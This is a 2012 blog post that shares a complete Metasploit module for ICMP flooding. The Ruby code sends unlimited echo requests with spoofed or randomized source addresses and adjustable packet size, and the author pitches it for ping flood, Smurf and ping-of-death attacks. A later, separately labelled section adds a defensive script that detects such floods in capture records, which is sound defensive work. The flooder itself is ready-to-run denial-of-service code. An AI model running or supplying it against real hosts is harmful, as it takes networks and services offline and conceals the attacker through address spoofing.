1/15/2012

Another simple Metasploit module: ICMP Flooder


Hi again! I said I was going to develop VoIP-related Metasploit modules, but I was reading the PacketFu documentation and found that writing an ICMP flooder couldn't be too complicated at this point. So I am sharing this code too. I decided to include the SHOST and SIZE options as well, to get a more flexible module able to produce different flavors of this attack such as Ping flood, Smurf or Ping of death. The next pictures show the module in the same way as in the last post.

Code:

-------------------------------------------------------------------------
require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Auxiliary::Dos
  include Msf::Exploit::Capture

  def initialize
    super(
      'Name'        => 'ICMP Flooder',
      'Description' => 'A simple ICMP flooder',
      'Author'      => 'Jesus Perez',
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision: 0 $'
    )

    register_options(
      [
        OptAddress.new('SHOST', [false, 'The spoofable source address (else randomizes)']),
        OptInt.new('NUM', [false, 'Number of ping packets to send (else unlimited)']),
        OptInt.new('SIZE', [false, 'Size of ICMP packets to send (else 256 bytes)'])
      ], self.class)
    deregister_options('FILTER','PCAPFILE','SNAPLEN')
  end

  def srchost
    datastore['SHOST'] || [rand(0x100000000)].pack('N').unpack('C*').join('.')
  end

  def size
    datastore['SIZE'].to_i.zero? ? 256 : datastore['SIZE'].to_i
  end

  def run
    open_pcap

    sent = 0
    num = datastore['NUM']

    print_status("ICMP flooding #{rhost}...")

    p = PacketFu::ICMPPacket.new
    p.icmp_type = 8
    p.icmp_code = 0
    p.ip_daddr = rhost

    while (num <= 0) or (sent < num)
      p.ip_saddr = srchost
      p.payload = rand(36**size).to_s(36)
      p.recalc
      capture_sendto(p,rhost)
      sent += 1
    end

    close_pcap
  end
end

-------------------------------------------------------------------------


Figure: Usage information


Figure: Sniffed packets
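
On the receiving side, this traffic shows up as a burst of echo requests (ICMP type 8) toward one host, coming from many different source addresses when SHOST is left to randomize. The Ruby below is an added example, not part of the original post or of Metasploit: it flags that pattern in already-parsed capture records. The record layout, thresholds and sample data are assumptions made for the example, and the sample records are constructed.

```ruby
# Added example: flag ICMP echo-request floods in already-parsed capture records.
# Record layout (an assumption of this example):
#   [time_s, src, dst, icmp_type, payload_bytes]

ECHO_REQUEST = 8

# Constructed sample data: 400 echo requests in under a second from 400 different
# source addresses to one host, plus an ordinary 1-per-second ping to another host.
def sample_records
  flood  = (0...400).map { |i| [10.0 + i * 0.002, "10.#{i / 256}.#{i % 256}.1", '192.0.2.10', ECHO_REQUEST, 256] }
  normal = (0...5).map   { |i| [i.to_f, '198.51.100.7', '192.0.2.20', ECHO_REQUEST, 56] }
  (flood + normal).shuffle(random: Random.new(1))
end

# Returns { dst => { peak:, sources:, many_sources: } } for every destination that
# received more than max_requests echo requests inside any sliding window.
def detect_icmp_flood(records, window: 1.0, max_requests: 100)
  alerts = {}
  records.select { |r| r[3] == ECHO_REQUEST }.group_by { |r| r[2] }.each do |dst, recs|
    recs = recs.sort_by { |r| r[0] }
    start = 0
    peak = 0
    peak_range = nil
    recs.each_with_index do |rec, i|
      start += 1 while rec[0] - recs[start][0] > window # slide the window forward
      count = i - start + 1
      peak, peak_range = count, (start..i) if count > peak
    end
    next unless peak > max_requests

    sources = recs[peak_range].map { |r| r[1] }.uniq.size
    # Many one-off sources in the peak window is consistent with randomized spoofing.
    alerts[dst] = { peak: peak, sources: sources, many_sources: sources > peak / 2 }
  end
  alerts
end

if __FILE__ == $PROGRAM_NAME
  detect_icmp_flood(sample_records).each { |dst, a| puts "#{dst}: #{a}" }
end
```

A low `sources` count with a high `peak` points at a single fixed source address instead, which can be rate-limited or filtered directly.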

Jesús Pérez